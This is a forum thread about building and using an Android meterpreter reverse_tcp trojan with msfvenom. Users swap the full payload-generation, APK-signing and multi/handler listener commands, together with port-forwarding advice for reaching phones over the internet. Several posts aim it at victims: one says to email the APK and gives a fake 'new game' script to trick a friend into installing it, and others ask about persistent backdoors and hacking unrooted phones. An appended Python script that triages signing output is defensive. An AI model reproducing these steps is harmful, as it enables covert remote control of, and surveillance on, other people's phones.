Forum Thread: Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom?

Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing is that msfpayload was removed and replaced with msfvenom. I used to be able to just do:
msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk

Which would create the APK, and then
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST ip
exploit
To start listening, and it always worked once the APK was executed on the Android device (always my device, btw).

Now, I've tried substituting msfvenom -p for msfpayload, and it creates the APK, but when it is run and the listener is started, it does not connect.

Does anyone know what I'm doing wrong? I can't seem to figure out this new method of things...
Thanks!

67 Responses

Can you give us screenshots and the full command, please?

This is the command used to create the APK, which outputs a "hack.apk" in my root folder:

And this is the command used to start the listener (which used to result in my having control over the Android device, prior to the msfvenom update):

(I blurred names and IPs)
Also, if it makes any difference, I'm running Kali Linux.
And yes, it was intentional :)

Dude...it's super simple.
First create a payload :
root@kali :~# msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=5555 R > filename.apk

Now, email this file to the victim, but before you do that:

root@kali :~ # msfconsole
root@kali :~ # use multi/handler
root@kali :~ # set PAYLOAD android/meterpreter/reverse_tcp
root@kali :~ # set LHOST (your ip)
root@kali :~ # set LPORT 5555
root@kali :~ # exploit

Now, wait for the victim to download the file and then install it on his/her phone. Use social engineering to achieve this. Say, for example: "Hey, dude I just made a new game. Unfortunately I don't have anyone to try it out for me and give a review. So, will you help me? Please. Thanks, man, I appreciate it." Just an example!

Now the dumb "FRIEND" will install it and then open it and congrats : YOU GOT A METERPRETER SHELL on someone's phone. Now I'll leave u to ur imagination!

LOL!!! I died laughing when I saw that. I mean it's only his LAN so at least it isn't a bad slip up.

hi! in msfvenom command you missed lport!

Hi there!
The right syntax for msfvenom is:
msfvenom -p android/meterpreter/reversetcp LHOST=yourip -o /testdir/test.apk_

I did these steps. After creating the app I tried to install it, but it's showing a parse error. What do I do? Please tell me.

After generating the payload, sign the .apk with d2j-apk-sign (name of your apk file). Now you have signed your apk file. Send it to the victim.

It says invalid payload :- andriod/meterpreter/reversetcp
What should i do ....?

reverse_tcp

Same error, "invalid payload", though the syntax is correct; I have checked it many times. What should I do next?

check spelling

Maybe an obvious question (beginner here), but how do you figure out what lport number to use?

This worked perfect for me :
terminal : msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/whatever.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost {your Ip}
set lport 4444
exploit

Once the victim tries to run it in his device. You'll get a meterpreter session.

Thanks Man,
I Just Forgot About This Line "set payload android/meterpreter/reverse_tcp"
Thank You A Lot :)

I did everything, but when I try to install the apk file on my own Android device to check, it says application not installed! Please can anyone tell me how to fix this error? Thank you!

Sorry, I built the payload but I can't install it. The error when I install it:
application not installed

Check out my video for this tutorial!

One question.
The process worked perfectly for me.

But when you restart the computer, could you again connect to the victim phone, and how?

I tried again as well as the first time but nothing:

use exploit/multi/handler
set payload android/meterpreter/reversetcp
set lhost {Ip}
set lport 4444
exploit

If anyone knows the answer: how can we connect again to our "infected" phone, or do we need to re-send the file?
Please help.

Thanks.

actually after you exploited ur victim for first time .. then and there create a persistent backdoor that would allow you access all the time .. regardless of system rebooting

And how can i create that persistent backdoor ? armitage ?

Hi guys, everything worked perfectly for me, but when I sent the APK file to my phone it could not be installed. It shows "parsing error" because the backdoor file size was "0". I don't know why. Can anyone help, please?

u have some syntax error in making the APK file,

msfvenom -p android/meterpreter/reverse_tcp LHOST=" ur IP" LPORT=" the port u want to listen on it" R > /PATH/TO/file.APK

there is an underscore >>> _ <<< between reverse and tcp

Hi guys, greetings. Do you know the cause of this problem when you start the exploit? I have been using it on my Android 5.0 but it always throws me the same fault:

Meterpreter session 1 closed. Reason: Died

I can't install the app I created on my phone. What should I do?

when i heck in lan i have no prob

but out lan i get this

Meterpreter session 1 closed. Reason: Died

You can also download the "One Click APK Signer".

Then drag and drop your Payload.apk on the one click signer cmd and it creates a signed Payload.apk that you can install on your victim Android!

Peace

i used LPORT=4444 and by online tool i checked and came to know that port 4444 is not open what is problem can anybody tell me.... port 80 is opened and i have tried by making virtual server and port forwarding but nothing worked..... can anybody resolve this port problem?? can i use port 80 for exploiting>>>???

thats because windows firewall blocks the same... add an exception or disable firewall temporarily...

use port 443 or 6666

If the app is uninstalled we can't get access to the victim's mobile...so is there any other way like if it is once installed it can't be removed or running in background script without the use of app

How should I use it for a public IP? It is not working for a public IP... I cannot bind with the public IP.

I tried the first step using the following command in Kali Linux:

msfvenom -p android/meterpreter/reversetcp LHOST=172.16.1.79 LPORT=4444 R > /root/Upgrader.apk

here is the command with the response can someone explain?

msfvenom -p android/meterpreter/reversetcp LHOST=172.16.1.79 LPORT=4444 R > /root/Upgrader.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8824 bytes

hey i got this error message did you patch this issue
can you help me

its right continue next step

i dont have rooted phone ..
is this support new smartphone i try this but not working on my android phone can you help me ..
how to hack normal android phone like unrooted mobiles
can you help me im just a beginner

msfvenom --platform Android -p android/meterpreter/reversetcp LHOST=192.168.x.x R > /root/Upgrader.apk
This command removes first Platform error, do it for others(mean add options for Arch & Encoders too.)
But in my case I successfully achieved my target without implementing the arch and encoder options. (Good luck)

hey guys,

i created the payload file on VMware and im trying to copy it onto my host OS which is windows. but it isnt happening. the error states that the file doesnt belong to the location any longer. what do i do?

thank you

hey guys,
this is the output i'm getting when i type exploit. what should i do so that this changes

As soon as the Target Executes your Payload the rest will happen.

My exploit stays at this state even when I execute the apk on my phone.

For starters guys, anyone who does this needs to learn to troubleshoot their scripts.
All but one person (RAIN RAIN) noticed the "--platform" module missing.

When it spits out an error read what it says, then check the help file (usually "-h" or "--help") to see what options are relevant. Then if all else fails, try google ;)

Try LPORT=8080. That's ONLY port that works for me.

msfvenom -p android/meterpreter/reversetcp LHOST=yourip LPORT=8080 > /root/Desktop/anything.apk

New terminal:

msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT 8080

Hey, I could really use some help here...

this is the response that i get after typing the command and follows is either super weird or something super dumb on my part, but im sure one of you smart lads will crack it.. and no, that's not the ip address that i typed.

@Alva-Vostro-3546:~# msfvenom -p android/meterpreter/reversetcp lhost=X.X.X.X lport=4444 R > /root/mmupgrade.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes

Try to replace reversetcp with reverse_tcp

When I gave "use exploit/multi/handler" it's showing command not found... What is the reason? Guys, help me.

hi ..!
i'm new here i show your video it's very helpful & i like to know more informations please help me.
when i try i always get like this what can i do...?

I installed the apk on my phone, but when I click the apk nothing happens. I do not get into meterpreter; instead there is a button named ReverseTCP inside the apk, which I tried to click but didn't get the connection. I am attaching a screenshot of the same. Please tell me where I am going wrong.

Open a terminal and type "route -n". Now, look under where it says "Gateway". Open your browser. In the address-bar, enter the number from the terminal. You should either be presented with a login-screen or have a page with router/modem/wlan settings load up. You're going to have to find out the credentials needed if you don't know them in order to get into your settings. Once you're in, navigate to an area having to do with "ip/port-forwarding". Look back at how you generated your payload and the information you inputted into it. You're going to have to enter the port and your machine's local IP into the settings, and save it. After this, you should be able to bind the port and IP address and stop experiencing issues. Also, before doing any of this, it may be a good idea to run these commands: "sudo apt-get update", "sudo apt-get dist-upgrade", "msfupdate", and "reboot".

Hi i'm new to the forum and to this kali linux thing.I entered the msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/whatever.apk and it works but then i try to enter msfconsole and i get this.What can be done about this?

try running these commands
sudo apt-get update
sudo apt-get dist-upgrade
msfupdate
sudo apt autoremove
reboot
After your machine comes back up, run the first three commands again.

Then, try to enter msfconsole. I'm not sure what to tell you if the problem persists. All I can see is that the machine is misinterpreting the source-script, which appears to be in Ruby. If the problem persists... tbh I'd just reinstall Kali and be sure to get the network mirrors correct, along with all of the updates, etc. Also, be sure that the document "/etc/apt/sources.list" is correct.

sudo apt-get update
sudo apt-get dist-upgrade
msfupdate
sudo apt autoremove
(follow the instructions from my last post)
route -n
ifconfig
msfconsole
msfvenom -p android/meterpreter/reversetcp LHOST=(PublicIP) LPORT=443 -o ~/Desktop/exampleTroj.apk
(note the difference between Public_IP and your local(IPv4) address).
(Be sure to have correctly followed the instructions from my last post).
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost (IPv4 Addr)
set lport 443
(Transport the trojan to the phone).
exploit
(wait about 5 seconds and then open the apk on the phone. You should see a session open).

Jason, seems like you're good at that. Can you maybe help me out?
I want to make a payload for android that works over WAN

that what i do
msfvenom -p android/meterpreter/reverse_tcp LHOST=181.114.103.5 (public ip) LPORT=2213 R > /root/Desktop/vm.apk
I signed the payload with SignApk jar
PORT FORWARDED the ip I found in my kali network settings: 192.168.10.129:2213
Msfconsole
Use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.10.129
set LPORT 2213
Exploit

Everything connect correctly

But then I install the app on my phone and run it but nothing happens, so which ip should i use for the payload:
handler:
port forward:

Hi, I try to hack an Android device but can't get a meterpreter session. The apk file is successfully installed on the device with the name "Main Activity". Nothing happened when I open the installed app; I can't get any session. I tried many other Android devices but am facing the same problem. But when I tried on BLUESTACK (installed on my laptop) I get a meterpreter session. WHY I DIDN'T GET SESSION ON ANDROID DEVICE ????? Please Help...

Step 1: DIDN'T GET METERPRETER SESSION ON ANDROID DEVICE

Device name: Mi Phone
Model Number: Mi 4i
Android version: 5.0.2 LRX22G

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.255.144 LPORT=9986 R > test.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8789 bytes

root@kali:~# keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Enter keystore password:
Re-enter new password:
What is your first and last name?
Unknown: a
What is the name of your organizational unit?
Unknown: b
What is the name of your organization?
Unknown: c
What is the name of your City or Locality?
Unknown: d
What is the name of your State or Province?
Unknown: e
What is the two-letter country code for this unit?
Unknown: f
Is CN=a, OU=b, O=c, L=d, ST=e, C=f correct?
no: yes

Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days
for: CN=a, OU=b, O=c, L=d, ST=e, C=f
Enter key password for <alias_name>
(RETURN if same as keystore password):
Storing my-release-key.keystore

root@kali:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore test.apk alias_name

Enter Passphrase for keystore:
adding: META-INF/ALIAS_NA.SF
adding: META-INF/ALIAS_NA.RSA
signing: AndroidManifest.xml
signing: resources.arsc
signing: classes.dex
jar signed.

Warning:

No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-11-28) or after any future revocation date.

root@kali:~# jarsigner -verify -verbose -certs test.apk

s 258 Thu Jul 13 07:36:12 EDT 2017 META-INF/MANIFEST.MF

X.509, CN=a, OU=b, O=c, L=d, ST=e, C=f
certificate is valid from 7/13/17 7:41 AM to 11/28/44 6:41 AM
CertPath not validated: Path does not chain with any of the trust anchors

X.509, CN=Android Debug, O=Android, C=US
certificate is valid from 8/29/15 3:57 AM to 8/24/35 3:57 AM
CertPath not validated: Path does not chain with any of the trust anchors

393 Thu Jul 13 07:44:26 EDT 2017 META-INF/ALIAS_NA.SF
1254 Thu Jul 13 07:44:26 EDT 2017 META-INF/ALIAS_NA.RSA
272 Thu Jul 13 07:36:12 EDT 2017 META-INF/SIGNFILE.SF
1917 Thu Jul 13 07:36:12 EDT 2017 META-INF/SIGNFILE.RSA
0 Thu Jul 13 07:36:12 EDT 2017 META-INF/
sm 6992 Thu Jul 13 07:36:12 EDT 2017 AndroidManifest.xml

X.509, CN=a, OU=b, O=c, L=d, ST=e, C=f
certificate is valid from 7/13/17 7:41 AM to 11/28/44 6:41 AM
CertPath not validated: Path does not chain with any of the trust anchors

X.509, CN=Android Debug, O=Android, C=US
certificate is valid from 8/29/15 3:57 AM to 8/24/35 3:57 AM
CertPath not validated: Path does not chain with any of the trust anchors

sm 572 Thu Jul 13 07:36:12 EDT 2017 resources.arsc

X.509, CN=a, OU=b, O=c, L=d, ST=e, C=f
certificate is valid from 7/13/17 7:41 AM to 11/28/44 6:41 AM
CertPath not validated: Path does not chain with any of the trust anchors

X.509, CN=Android Debug, O=Android, C=US
certificate is valid from 8/29/15 3:57 AM to 8/24/35 3:57 AM
CertPath not validated: Path does not chain with any of the trust anchors

sm 17460 Thu Jul 13 07:36:12 EDT 2017 classes.dex

X.509, CN=a, OU=b, O=c, L=d, ST=e, C=f
certificate is valid from 7/13/17 7:41 AM to 11/28/44 6:41 AM
CertPath not validated: Path does not chain with any of the trust anchors

X.509, CN=Android Debug, O=Android, C=US
certificate is valid from 8/29/15 3:57 AM to 8/24/35 3:57 AM
CertPath not validated: Path does not chain with any of the trust anchors

s = signature was verified
m = entry is listed in manifest
k = at least one certificate was found in keystore
i = at least one certificate was found in identity scope

  • Signed by "CN=a, OU=b, O=c, L=d, ST=e, C=f"

Digest algorithm: SHA1
Signature algorithm: SHA1withRSA, 2048-bit key

  • Unparsable signature-related file META-INF/SIGNFILE.SF

jar verified.

Warning:
This jar contains entries whose certificate chain is not validated.

This jar contains signatures that does not include a timestamp. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2035-08-24) or after any future revocation date.

root@kali:~# zipalign -v 4 /root/test.apk /root/Desktop/test.apk
Verifying alignment of /root/Desktop/test.apk (4)...
50 META-INF/MANIFEST.MF (OK - compressed)
293 META-INF/ALIAS_NA.SF (OK - compressed)
639 META-INF/ALIAS_NA.RSA (OK - compressed)
1748 META-INF/ (OK)
1798 META-INF/SIGNFILE.SF (OK - compressed)
2079 META-INF/SIGNFILE.RSA (OK - compressed)
3167 AndroidManifest.xml (OK - compressed)
4934 resources.arsc (OK - compressed)
5164 classes.dex (OK - compressed)
Verification successful

root@kali:~# msfconsole

msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.255.144
LHOST => 192.168.255.144
msf exploit(handler) > set LPORT 9986
LPORT => 9986
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.255.144:9986
[*] Starting the payload handler...

i am getting this error..is that something suppose to do with REX??.. how to fix this??
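
A defender-side triage of the jarsigner -verify -verbose -certs output pasted in the post above, as an added example that is not part of the original thread: it flags the traits visible in that output (two signer certificates on every entry, one of them the Android Debug certificate, a SHA1 digest, and an unparsable signature file). The function names, finding labels and the abridged sample are constructed for this illustration.

```python
import re

# Entry line: optional flags (s/m/k/i), size, date, path.
ENTRY = re.compile(r"^\s*(?:([smki]+)\s+)?(\d+)\s+\w{3}\s+\w{3}\s+\d+\s+[\d:]+\s+\S+\s+\d{4}\s+(\S+)\s*$")
CERT = re.compile(r"^\s*X\.509,\s*(.+?)\s*$")
DEBUG_DN = "CN=Android Debug"  # subject DN shown for the second signer in the post

# Constructed sample, abridged from the shape of the output in the post.
SAMPLE = """\
s        258 Thu Jul 13 07:36:12 EDT 2017 META-INF/MANIFEST.MF

      X.509, CN=a, OU=b, O=c, L=d, ST=e, C=f
      certificate is valid from 7/13/17 7:41 AM to 11/28/44 6:41 AM
      X.509, CN=Android Debug, O=Android, C=US
      certificate is valid from 8/29/15 3:57 AM to 8/24/35 3:57 AM

sm     17460 Thu Jul 13 07:36:12 EDT 2017 classes.dex

      X.509, CN=a, OU=b, O=c, L=d, ST=e, C=f
      X.509, CN=Android Debug, O=Android, C=US

  - Signed by "CN=a, OU=b, O=c, L=d, ST=e, C=f"
    Digest algorithm: SHA1
    Signature algorithm: SHA1withRSA, 2048-bit key
  - Unparsable signature-related file META-INF/SIGNFILE.SF

jar verified.
"""

def parse_entries(output):
    """Map each archive entry to (flags, set of signer DNs listed under it)."""
    entries, current = {}, None
    for line in output.splitlines():
        m = ENTRY.match(line)
        if m:
            current = m.group(3)
            entries[current] = (m.group(1) or "", set())
            continue
        c = CERT.match(line)
        if c and current is not None:
            entries[current][1].add(c.group(1))
    return entries

def triage(output):
    """Return a sorted list of finding labels worth an analyst's attention."""
    findings = set()
    for path, (flags, signers) in parse_entries(output).items():
        if any(dn.startswith(DEBUG_DN) for dn in signers):
            findings.add("debug-cert")          # debug certificate on a delivered APK
        if len(signers) > 1:
            findings.add("multiple-signers")    # package was signed again by another key
        if not path.startswith("META-INF/") and "s" not in flags:
            findings.add("unsigned-entry")      # content not covered by a verified signature
    if re.search(r"Digest algorithm:\s*SHA-?1\b", output):
        findings.add("sha1-digest")
    if "Unparsable signature-related file" in output:
        findings.add("unparsable-signature-file")
    return sorted(findings)

if __name__ == "__main__":
    print(triage(SAMPLE))
```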
